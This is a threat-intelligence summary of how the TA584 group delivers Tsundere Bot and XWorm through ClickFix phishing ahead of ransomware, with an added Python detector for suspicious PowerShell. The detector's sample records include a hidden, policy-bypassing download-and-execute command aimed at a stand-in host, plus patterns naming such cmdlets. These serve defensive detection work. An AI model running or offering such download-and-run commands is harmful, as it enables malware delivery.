How TA584 Leverages Tsundere Bot and XWorm for Ransomware Attacks
The TA584 threat group, acting as a high‑activity initial‑access broker, now employs the Tsundere Bot and XWorm remote‑access trojans in a multi‑stage phishing chain that culminates in ransomware deployment, with Proofpoint noting a two‑fold activity surge and expanded geographic reach in 2025.
Overview
TA584, a high‑activity Initial Access Broker (IAB), uses the Tsundere Bot and XWorm remote‑access trojans to obtain footholds that enable subsequent ransomware attacks.
Proofpoint has tracked TA584 since 2020. Activity volume doubled from the first quarter to the end of 2025, and the group expanded its target regions from North America, the UK and Ireland to Germany, other European countries, and Australia.
Tsundere Bot background
Tsundere Bot was first disclosed by Kaspersky last year and is linked to a Russian‑language threat group associated with the 123 Stealer malware. Although the original infection vector is unclear, the malware can be used for information gathering, data theft, lateral movement, and deployment of additional payloads.
Attack chain
The current chain begins with hundreds of compromised legacy email accounts that send phishing messages via SendGrid and Amazon SES. Each email contains a target‑specific link protected by geofencing and IP‑filtering, often routed through third‑party traffic distributors such as Keitaro.
Victims that pass the filters are presented with a CAPTCHA page, then redirected to a ClickFix page that prompts execution of a PowerShell command.
The PowerShell command downloads and runs an obfuscated script, which loads either XWorm or Tsundere Bot directly into memory while silently redirecting the browser to a legitimate site to mask the malicious activity.
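The PowerShell stage of the chain above is where a defender has the most usable telemetry. The following is an added example, not code from Proofpoint or the original article, that scores constructed process-creation records for the traits of such a command: a download cmdlet paired with in-memory execution, a hidden window, an encoded command, and a user-facing parent process such as a browser or the shell. Field names, sample command lines and the weighting are assumptions.

```python
import re

# Constructed sample process-creation records (hypothetical field names,
# modelled on Sysmon Event ID 1 / Windows 4688). Not real telemetry.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/a.txt' -UseBasicParsing)\""},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File \"C:\\Program Files\\Vendor\\update.ps1\""},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent": "chrome.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

# A download cmdlet and an in-memory execution primitive, in either order.
DOWNLOAD_EXEC = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b"
    r"|\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b.*\b(iex|invoke-expression)\b",
    re.I)
HIDDEN = re.compile(r"-(w|win|window|windowstyle)\s+hidden", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# Parents suggesting a user typed or pasted the command, as a ClickFix lure induces.
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def score(event):
    """Return (score, reasons) for one record; non-PowerShell images score 0."""
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    cmd, reasons = event["cmdline"], []
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download-and-execute")
    if HIDDEN.search(cmd):
        reasons.append("hidden-window")
    if ENCODED.search(cmd):
        reasons.append("encoded-command")
    if event["parent"].lower() in USER_FACING_PARENTS:
        reasons.append("user-facing-parent")
    return len(reasons), reasons


def flag(events, threshold=2):
    """Return (record, reasons) pairs whose score reaches the threshold."""
    hits = []
    for e in events:
        s, reasons = score(e)
        if s >= threshold:
            hits.append((e, reasons))
    return hits


if __name__ == "__main__":
    for e, reasons in flag(EVENTS):
        print(e["parent"], "->", e["image"], ":", ", ".join(reasons))
```

With the default threshold only the first record is flagged; the encoded-command record scores one and would need a second trait (or a lower threshold) to surface, which is the trade-off a tuning pass on real telemetry has to make.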
Payloads observed
Proofpoint lists numerous payloads previously used by TA584, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT—the latter still observed in a 2025 incident.
Tsundere Bot architecture
Tsundere Bot is a Malware‑as‑a‑Service platform built on Node.js. Its installer is generated by a C2 panel and automatically deploys to victims.
The malware employs an enhanced EtherHiding technique to retrieve C2 server addresses from the Ethereum blockchain, with hard‑coded fallback addresses in case the primary endpoint fails.
Communication with the C2 server occurs over WebSocket. The malware includes system‑region detection logic: if the device uses a CIS member language (primarily Russian), execution terminates.
It gathers system information to build a host profile, can execute arbitrary JavaScript from the C2 server, functions as a SOCKS proxy, and hosts an internal marketplace for buying and selling trojan binaries.
Reference
https://www.bleepingcomputer.com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/